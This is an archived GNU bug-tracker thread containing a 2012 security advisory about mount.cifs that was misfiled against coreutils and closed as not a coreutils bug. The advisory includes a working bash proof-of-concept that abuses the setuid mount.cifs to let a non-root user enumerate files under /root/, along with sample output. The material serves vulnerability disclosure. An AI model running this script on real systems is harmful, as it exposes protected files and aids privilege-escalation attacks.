GNU bug report logs - #10965
mount.cifs vulnerability

Previous Next

Package: coreutils;

Reported by: Jesus Olmos <jesus.olmos <at> blueliv.com>

Date: Wed, 7 Mar 2012 18:40:02 UTC

Severity: normal

Tags: notabug

Done: Eric Blake <eblake <at> redhat.com>

Bug is archived. No further changes may be made.

Full log

View this message in rfc822 format

From: help-debbugs <at> gnu.org (GNU bug Tracking System)
To: Eric Blake <eblake <at> redhat.com>
Cc: tracker <at> debbugs.gnu.org
Subject: bug#10965: closed (mount.cifs vulnerability)
Date: Wed, 07 Mar 2012 18:48:02 +0000

[Message part 1 (text/plain, inline)]
Your message dated Wed, 07 Mar 2012 11:45:54 -0700
with message-id <4F57ACE2.4070703 <at> redhat.com>
and subject line Re: bug#10965: mount.cifs vulnerability
has caused the debbugs.gnu.org bug report #10965,
regarding mount.cifs vulnerability
to be marked as done.

(If you believe you have received this mail in error, please contact
help-debbugs <at> gnu.org.)


-- 
10965: http://debbugs.gnu.org/cgi/bugreport.cgi?bug=10965
GNU Bug Tracking System
Contact help-debbugs <at> gnu.org with problems

[Message part 2 (message/rfc822, inline)]
From: Jesus Olmos <jesus.olmos <at> blueliv.com>
To: bug-coreutils <at> gnu.org
Subject: mount.cifs vulnerability
Date: Wed, 07 Mar 2012 19:33:49 +0100

Hello, here is a bug report for mount.cifs,
is a little security breach on linux permissions by controlling a 
privileged chdir()

regards.



########## Blueliv Advisory 2012-004 ##########
- Discovered by: Jesus Olmos Gonzalez
- Risk: 5/5
- Impact: 1/5
####################################

1. VULNERABILITY
-------------------------
linux arbitrary privileged arbitrary chdir(),
this leads to an arbitarry file identification as root.

2. BACKGROUND
-------------------------
mount.cifs (GNU Software) is part of linux base system, and is setuided on
most of the distributions.

This software mounts cifs partition to authorized directories by fstab.


3. DESCRIPTION
-------------------------
Althow there is not authorized cifs mounts, is possible by the second 
parameter
to control a privileged chdir() syscall and infer the return value throught
the responses.

This implies, a little security breach on linux permissions. A non root user
can enumerate files and directories as root.

This can help to exploit another vulnerabilities, enumerate /root/ contents,
descriptors used by any process, user homes, etc ...

one of the attack vectors is /root/ directory scan:

[sha0 <at> spinlock advs]$ ./root_eye.sh wordlist /root/
--- directories ---
.pulse1
.bash_history
.alsaplayer
.dbus
.mozilla
.VirtualBox
.vim
.links
.config
.cpan
.gnome2
--- files ---
.pulse-cookie
.keystore
.bash_profile
dead.letter
.mysql_history
.Xauthority
.vimrc
.viminfo
secret

Also let to enumerate sub-sub directories in order to dump readable files.



4. PROOF OF CONCEPT
-------------------------
#!/bin/bash
# root enumerator 0day by jesus.olmos <at> blueliv.com
# discover root protected files & directories, user homes, process 
descriptors, ...

path=$2
wordlist=$1

for i in `cat $wordlist`
do

echo -n "$i:"

/sbin/mount.cifs  //127.0.0.1/a $path/$i

done 2>log.$$ 1>&2

echo --- directories ---
for i in `grep 'denied' log.$$ | cut -d ':' -f 1`
do
        echo $i
done

echo --- files ---
for i in `grep -i 'not a directory' log.$$ | cut -d ':' -f 1`
do
        echo $i
done

rm log.$$



5. BUSINESS IMPACT
-------------------------
The confidenciality can be breached,

This method of transfer files, is highly dangerous and can rely on a 
remote control of the server

6. SYSTEMS AFFECTED
-------------------------
all versions are affected

7. SOLUTION
-------------------------
The chdir() should be done after the fstab check.

8. REFERENCES
-------------------------
http://gnu.org


9. CREDITS
-------------------------
Jesus Olmos Gonzalez jolmos(at)blueliv(dot)com
BLUELIV

10. DISCOLSURE TIMELINE
-------------------------
February  20, 2012: Vulnerability discovered
March     07, 2012: Reported to the vendor


11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.



-- 
Jesus Olmos
jesus.olmos <at> blueliv.com

Parc Innovació La Salle
C/Sant Joan de la Salle 42, Planta 3
08022 Barcelona
Telf. + 34 902908712
Fax. + 34 933960900




[Message part 3 (message/rfc822, inline)]
From: Eric Blake <eblake <at> redhat.com>
To: Jesus Olmos <jesus.olmos <at> blueliv.com>
Cc: 10965-done <at> debbugs.gnu.org
Subject: Re: bug#10965: mount.cifs vulnerability
Date: Wed, 07 Mar 2012 11:45:54 -0700

[Message part 4 (text/plain, inline)]
tag 10965 notabug
thanks

On 03/07/2012 11:33 AM, Jesus Olmos wrote:
> Hello, here is a bug report for mount.cifs,
> is a little security breach on linux permissions by controlling a
> privileged chdir()

Thanks for the report, but you have sent it to the wrong list.  GNU
coreutils does not maintain mount.cifs, so there is nothing this list
can do about fixing anything.  I'm closing the coreutils bug aspect,
although I encourage you to continue pursuing a correct fix with the
correct folks in charge of mount.cifs.

-- 
Eric Blake   eblake <at> redhat.com    +1-919-301-3266
Libvirt virtualization library http://libvirt.org


[signature.asc (application/pgp-signature, attachment)]
This bug report was last modified 13 years and 134 days ago.

Previous Next

GNU bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.